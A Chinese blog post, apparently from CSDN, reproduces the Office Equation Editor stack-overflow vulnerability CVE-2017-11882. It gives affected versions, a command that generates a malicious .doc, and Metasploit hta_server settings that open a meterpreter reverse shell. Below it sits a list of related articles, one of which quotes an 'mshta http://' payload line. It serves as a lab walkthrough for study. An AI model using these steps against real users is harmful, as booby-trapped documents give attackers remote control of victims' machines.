CVE-2017-11882:Office内存破坏漏洞

最新推荐文章于 2025-08-14 19:58:22 发布
原创 最新推荐文章于 2025-08-14 19:58:22 发布 · 750 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows

本文详细介绍了CVE-2017-11882漏洞,这是一个影响Microsoft Office多个版本的安全问题,由栈缓冲区溢出引起。漏洞利用涉及通过恶意Office文档触发远程执行代码,如在Kali环境下创建含有恶意代码的doc文件,并在靶机上打开以弹出计算器。实战利用中提到了使用MSF框架的hta_server模块生成载荷,以及步骤化的攻击过程。

影响范围

  • MicrosoftOffice 2000 
  • MicrosoftOffice 2003 
  • MicrosoftOffice 2007 Service Pack 3 
  • MicrosoftOffice 2010 Service Pack 2 
  • MicrosoftOffice 2013 Service Pack 1
  • MicrosoftOffice 2016

利用条件

  • 在影响范围内的应用
  • 用户打开恶意Office

漏洞概述

CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞

漏洞利用

简易测试

在kali下执行生成一个含有恶意代码的doc进行测试,下面指令的意思是调用cmd并执行calc.exe:

python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc

在靶机上打开就会弹出计算器:

实战利用

Step 1:使用MSF框架的hta_server模块生成载荷

use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.174.129
set SRVPORT 9999
set URIPATH abc

 Step 2:使用EXP生成带有恶意命令的doc文件

 Step 3:在靶机上打开test.doc文档

 Step 4:之后成功反弹shell

参考链接

GitHub - Ridter/CVE-2017-11882: CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882

https://github.com/Al1ex/Heptagram/tree/master/Windows%20Office/CVE-2017-11882

CVE-2017-11882解决方案
a870488326的博客
06-06 1282
文章摘自:http://www.freebuf.com/vuls/154462.html 漏洞影响版本: Office 365 Microsoft Office 2000       Microsoft Office 2003       Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2...
CVE-2017-11882
weixin_44932880的博客
01-16 1900
CVE-2017-11882 CVE-2017-11882是微软公布的一个远程执行漏洞office2017具有该漏洞。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。 调试环境 windows7_sp1(有这个sp1才能安装vmtools) office 2007 x86 olldbg ida 先ida找到漏洞出现的地方 通过od动态调试查看出拷贝的是一个字符串”T
漏洞cve2017-11882
m0_64973256的博客
12-21 904
所以我们需要在EQNEDT32.exe中下断点,而不是word里面下断点。可以看到计算器的父进程是cmd,但是cmd的父进程存在PID,但是在列表中却找不到PID为1404的进程,卡顿许久,猜测或许是cmd父进程隐藏了自己或者启动时间太短,启动完自己结束。也就是这里是通过淹没返回地址到WinExec上,然后通过修改字符串控制WinExec的参数,启动cmd打开计算器实现。通过启动cmd,打开了计算器,而之后的的AAAA等都是传给计算器参数,是无效的。
CVE-2017-11882漏洞分析
热门推荐
鬼手的博客
08-05 1万+
文章目录分析环境漏洞描述漏洞成因漏洞分析获取poc复现漏洞漏洞分析定位漏洞模块定位漏洞函数定位漏洞触发点解决方案 分析环境 **环境:**W7 x64 Office2013 **工具:**windbg IDA Pro 漏洞描述 CVE-2017-11882是微软公布的一个远程执行漏洞,通杀目前市面上的所有office版本及Windows操作系统(包括刚刚停止支持的Office 2007)。该漏...
CVE-2017-11882(Microsoft Office远程代码执行漏洞
最新发布
m0_73399576的博客
08-14 941
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1877
(一次大作业,比较啰嗦 见谅) 漏洞介绍 201711月14号,微软推送了常规的安全更新,其中就包括CVE-2017-11882的安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞的利用效果,堪称“无色无味”,即整个过程几.
FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY
09-08
当IsValueQName函数处理非标准命名空间时,解析过程中的错误处理机制导致了内存破坏,从而允许攻击者执行任意代码。 该漏洞的利用表明,攻击者正积极寻找并利用软件中的未公开漏洞来部署高级恶意软件。FINSPY作为一...
CVE-2017-8570漏洞复现与研究
空旷在远方
09-22 3495
CVE-2017-8570漏洞复现与研究 ——2018.7.2   目  录 1引言     1.1微软office漏洞背景 1.2 CVE-2017-8570简介 1.3 office适用版本 2原理简单分析 2.1漏洞原理简单分析 2.2漏洞原理简单图解 2.3相关知识介绍 2.3.1 ppsx介绍 2.3.2 exp介绍 3利用复现过程 3.1环境搭建 3.1...
Office CVE-2017-8570远程代码执行漏洞复现
看不尽的尘埃——博客
11-19 574
简介 CVE-2017-8570漏洞是利用复合Moniker绕过了CVE-2017-0199的补丁针对Script Moniker和URL Moniker相关classid的拦截。CVE-2017-8570是一个逻辑漏洞,和常规的内存破坏漏洞不同,这类漏洞无需复杂的利用手法,直接就可以在office文档中运行任意的恶意脚本。 影响版本 复现环境 靶机:windows...
CVE-2017-11882CVE-2017-11882(通杀Office 2003到2016)
03-04
CVE-2017-11882概述 从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这个漏洞,构造带有外壳后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。 影响版本: office 2003 office 2007 office 2010 office 2013 office 2016 用法 python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc 点击生成的“ test.doc”,顺利投放计算机工具。 python Command_CVE-2017-11882.py -c "mshta http://192.
CVE-2018-8174(IE浏览器远程代码执行漏洞)
94小菜
11-29 975
漏洞描述: VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。      在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Exp
CVE-2017-11882 Office漏洞
4SecNet团队专栏
03-16 944
简介 CVE-2017-11882属于缓冲区溢出类型漏洞,造成漏洞的原因是,EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。 深究其中的具体原因还要对ole文件的数据格式进行了解: ole文件的数据格式 ...
漏洞分析之CVE-2017-11882
airuihuan5211的博客
11-26 442
漏洞分析之 CVE-2017-11882 目录 漏洞分析之 CVE-2017-11882目录☛ 漏洞介绍☛ 漏洞分析☛ 1.漏洞分析环境与工具☛ 2.获取 Poc[点击????]☛ 3.复现漏洞☛ 4.分析漏洞☛ 5.漏洞利用☛ 6.利用漏洞2☛ 总结☛ 参考资料完成时间:2018-10-23 10:24:05 星期二 ☛ 漏洞介绍 安全公司Embedi最早报告了漏洞,其出现在...
CVE-2017-11882漏洞成因分析及白象样本分析
qq_45591829的博客
07-08 2028
CVE-2017-11882是一个广为人知的Microsoft Office漏洞,影响2000到2016版本。具体而言漏洞产生的原因是Equation Editor组件(EQNEDT32.EXE)读入包含MathType的OLE数据,在拷贝公式字体名称时没有对名称长度进行校验,进行了不安全的复制。攻击者可以利用这个漏洞,刻意构造的数据内容覆盖栈上的函数返回地址,造成栈缓冲区溢出,劫持程序执行流程,执行自己的恶意代码。
WindowsCVE-2017-11882漏洞利用
古月浪子的博客
02-09 3470
CVE-2017-11882是一个Office漏洞,虽然该漏洞已经有补丁了,且杀毒软件也能查出利用了该漏洞的恶意文档,但是学习和复现该漏洞仍是一项令人受益颇多的过程 为了复现该漏洞,我们需要准备Office2016及以前的版本,这里我选择的是2016版本 利用漏洞的主要手段是,依靠公式编辑器中的缓冲区溢出执行短长度命令行以及Office自动在TEMP目录下临时释放附件的特性,达到执行任意代码的效果 导致漏洞的罪魁祸首就是一个叫EQNEDT32.EXE的程序,该文件的位置可以用任务管理器查看进程文件来定位
[漏洞样本分析]CVE-2017-11882
r250414958的博客
11-01 3546
环境: Win7(专业版) office 2003 sp3(完全版) 工具: Ollydbg IDA Pro PEid Kali-Linux metasploit POC来源: https://github.com/embedi/CVE-2017-11882 漏洞介绍: 安全公司Embedi最早报告了漏洞,他们在一个老旧的微软工具Equation Editor中的EQNEDT32...
漏洞复现|Microsoft Office数学公式编辑器内存损坏漏洞CVE-2017-11882
weixin_42282189的博客
10-26 499
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出。 2、影响范围 office 2003 office 2007 office 2010 office 2013 office 2016 3、测试环境 win10:21H1 offi.
CVE-2017-11882:掌握通杀Office全版本的严重漏洞
根据给定的文件信息,我们将深入探讨CVE-2017-11882这一安全漏洞,及其在Microsoft Office软件中的影响和潜在危害。 CVE-2017-11882是一个安全漏洞,其影响范围包括Microsoft Office的多个版本,从Office 2003到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值